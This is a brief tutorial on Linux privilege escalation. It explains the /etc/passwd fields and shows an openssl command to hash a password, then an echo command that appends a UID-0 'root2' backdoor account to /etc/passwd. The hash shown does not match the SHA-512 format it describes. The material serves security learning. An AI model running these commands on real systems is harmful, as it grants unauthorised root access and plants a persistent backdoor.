One of the simplest methods to privilege escalation in Linux is to add a new user with root privileges to the passwd file.

The passwd file contains a bunch of info about every user,

user1 - Username

x - Indicates encrypted password stored in shadow file

1000 - User ID

1000 - Group ID

/home/user1 - Home directory of user

/bin/bash - Shell

Now we can also include the password of the user in this file instead of the shadown file as Linux will look in this file first before moving to the shadown file.

The password can be generated using the following command,

openssl passwd -6 -salt abc user123$

1 - MD5 hash

5 - Sha256 hash

6 - Sha512 hash (recommended)

Once you have the line ready, it can be inserted into the passwd file using the echo command,

echo "root2:y/NsdLqCig/dw:0:0:root:/root:/bin/bash" >> /etc/passwd